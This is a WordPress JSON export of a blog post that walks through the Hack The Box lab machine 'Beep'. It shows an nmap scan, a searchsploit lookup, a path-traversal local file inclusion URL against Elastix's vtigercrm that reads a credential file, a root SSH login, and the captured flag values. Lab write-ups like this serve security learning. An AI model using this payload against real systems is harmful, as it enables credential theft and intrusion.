{"id":3727,"date":"2020-08-15T16:17:16","date_gmt":"2020-08-15T07:17:16","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3727"},"modified":"2020-08-30T23:34:02","modified_gmt":"2020-08-30T14:34:02","slug":"hack-the-box-beep-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3727","title":{"rendered":"Hack The Box &#8211; Beep &#8211; Walkthrough"},"content":{"rendered":"<p>Solved this box with heavy reference to <a href=\"https:\/\/paichan-it.hatenablog.com\/entry\/2020\/05\/01\/221552\">[Hack The Box] Beep Walkthrough<\/a>.<\/p>\n<h3>Ports 80 and 443 are exposed<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 beep.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 14:40 UTC\r\nNmap scan report for beep.htb (10.10.10.7)\r\nHost is up (0.046s latency).\r\nNot shown: 89 filtered ports\r\nPORT      STATE SERVICE    VERSION\r\n22\/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)\r\n|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)\r\n25\/tcp    open  smtp       Postfix smtpd\r\n|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,\r\n80\/tcp    open  http       Apache httpd 2.2.3\r\n|_http-server-header: Apache\/2.2.3 (CentOS)\r\n|_http-title: Did not follow redirect to https:\/\/beep.htb\/\r\n|_https-redirect: ERROR: Script execution failed (use -d to debug)\r\n110\/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\r\n|_pop3-capabilities: APOP AUTH-RESP-CODE STLS LOGIN-DELAY(0) UIDL EXPIRE(NEVER) USER IMPLEMENTATION(Cyrus POP3 server v2) TOP RESP-CODES PIPELINING\r\n111\/tcp   open  rpcbind    2 (RPC #100000)\r\n143\/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\r\n|_imap-capabilities: 
THREAD=ORDEREDSUBJECT Completed BINARY CONDSTORE ACL ATOMIC MULTIAPPEND STARTTLS IDLE URLAUTHA0001 X-NETSCAPE IMAP4 QUOTA RENAME ID SORT LISTEXT LITERAL+ OK NAMESPACE CATENATE ANNOTATEMORE NO IMAP4rev1 THREAD=REFERENCES UIDPLUS CHILDREN UNSELECT LIST-SUBSCRIBED MAILBOX-REFERRALS RIGHTS=kxte SORT=MODSEQ\r\n443\/tcp   open  ssl\/https?\r\n|_ssl-date: 2020-08-11T14:49:31+00:00; +5m27s from scanner time.\r\n993\/tcp   open  ssl\/imap   Cyrus imapd\r\n|_imap-capabilities: CAPABILITY\r\n995\/tcp   open  pop3       Cyrus pop3d\r\n3306\/tcp  open  mysql?\r\n|_mysql-info: ERROR: Script execution failed (use -d to debug)\r\n10000\/tcp open  http       MiniServ 1.570 (Webmin httpd)\r\n|_http-title: Site doesn't have a title (text\/html; Charset=iso-8859-1).\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: Hosts:  beep.localdomain, 127.0.0.1, example.com\r\n\r\nHost script results:\r\n|_clock-skew: 5m26s\r\n\r\nTRACEROUTE (using port 80\/tcp)\r\nHOP RTT     ADDRESS\r\n1   0.13 ms 172.17.0.1\r\n2   3.12 ms 10.10.10.7\r\n\r\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 364.97 seconds\r\n<\/pre>\n<h3>Searching for Elastix vulnerabilities<\/h3>\n<p>Accessing the site shows that Elastix is running.<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248-300x228.jpg\" alt=\"\" width=\"300\" height=\"228\" class=\"alignnone size-medium wp-image-3728\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248-300x228.jpg 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248-1024x778.jpg 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248-768x584.jpg 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-11_235248.jpg 1516w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# searchsploit elastix\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                                         |  Path\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nElastix - 'page' Cross-Site Scripting                                                                                                                  | php\/webapps\/38078.py\r\nElastix - Multiple Cross-Site Scripting Vulnerabilities                                                                         
                       | php\/webapps\/38544.txt\r\nElastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                                          | php\/webapps\/34942.txt\r\nElastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                                       | php\/webapps\/37637.pl\r\nElastix 2.x - Blind SQL Injection                                                                                                                      | php\/webapps\/36305.txt\r\nElastix &lt; 2.5 - PHP Code Injection                                                                                                                     | php\/webapps\/38091.php\r\nFreePBX 2.10.0 \/ Elastix 2.2.0 - Remote Code Execution                                                                                                 | php\/webapps\/18650.py\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n\r\n# searchsploit -m 37637\r\n  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion\r\n      URL: https:\/\/www.exploit-db.com\/exploits\/37637\r\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/37637.pl\r\nFile Type: ASCII text, with CRLF line terminators\r\n\r\nCopied to: \/home\/shimizu\/deep\/37637.pl\r\n<\/pre>\n<p>Based on 37637.pl, accessing the following URL yields the ID and password.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nhttps:\/\/beep.htb\/vtigercrm\/graph.php?current_language=..\/..\/..\/..\/..\/..\/..\/..\/\/etc\/amportal.conf%00&module=Accounts&action\r\n<\/pre>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603.png\"><img 
loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603-282x300.png\" alt=\"\" width=\"282\" height=\"300\" class=\"alignnone size-medium wp-image-3729\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603-282x300.png 282w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603-964x1024.png 964w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603-768x816.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-15_161603.png 1164w\" sizes=\"(max-width: 282px) 100vw, 282px\" \/><\/a><\/p>\n<h3>Trying an SSH login with the obtained ID and password<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# ssh root@10.10.10.7\r\nUnable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\r\n\r\n# echo &quot;Host 10.10.10.7&quot; &gt;&gt; ~\/.ssh\/config\r\n# echo &quot;KexAlgorithms +diffie-hellman-group1-sha1&quot; &gt;&gt; ~\/.ssh\/config\r\n\r\n# ssh root@10.10.10.7\r\nroot@10.10.10.7's password:\r\nLast login: Sat Aug 15 09:57:30 2020 from 10.10.14.7\r\n\r\nWelcome to Elastix\r\n----------------------------------------------------\r\n\r\nTo access your Elastix System, using a separate workstation (PC\/MAC\/Linux)\r\nOpen the Internet Browser using the following URL:\r\nhttp:\/\/10.10.10.7\r\n\r\n&#x5B;root@beep ~]# cat \/root\/root.txt\r\nd88e006123842106982acce0aaf453f0\r\n&#x5B;root@beep ~]# cat \/home\/fanis\/user.txt\r\naeff3def0c765c2677b94715cffa73ac\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Solved this box with heavy reference to [Hack The Box] Beep Walkthrough. Ports 80 and 443 are exposed # nmap -A -n -F -T5 beep.htb 
Starting Nmap 7.80 ( [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3727"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727\/revisions"}],"predecessor-version":[{"id":3786,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727\/revisions\/3786"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}